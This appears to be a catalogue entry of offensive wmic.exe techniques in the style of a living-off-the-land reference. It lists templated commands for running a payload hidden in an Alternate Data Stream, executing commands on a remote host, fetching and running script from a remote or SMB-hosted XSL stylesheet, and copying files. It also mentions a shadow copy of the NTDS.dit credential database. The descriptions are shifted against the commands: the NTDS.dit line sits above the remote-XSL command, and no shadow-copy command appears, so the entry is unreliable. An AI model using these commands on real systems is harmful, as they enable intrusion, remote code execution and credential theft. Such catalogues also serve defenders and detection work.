The WMI command-line (WMIC) utility provides a command-line interface for WMI
Execute a .EXE file stored as an Alternate Data Stream (ADS)
wmic.exe process call create "{PATH_ABSOLUTE}:program.exe"
Execute calc from wmic
wmic.exe process call create "{CMD}"
Execute evil.exe on the remote system.
wmic.exe /node:"" process call create "{CMD}"
Create a volume shadow copy of NTDS.dit that can be copied.
wmic.exe process get brief /format:"{REMOTEURL:.xsl}"
Executes JScript or VBScript embedded in the target remote XSL stylsheet.
wmic.exe process get brief /format:"{PATH_SMB:.xsl}"
Copy file from source to destination.
wmic.exe datafile where "Name='C:\\windows\\system32\\calc.exe'" call Copy "C:\\users\\public\\calc.exe"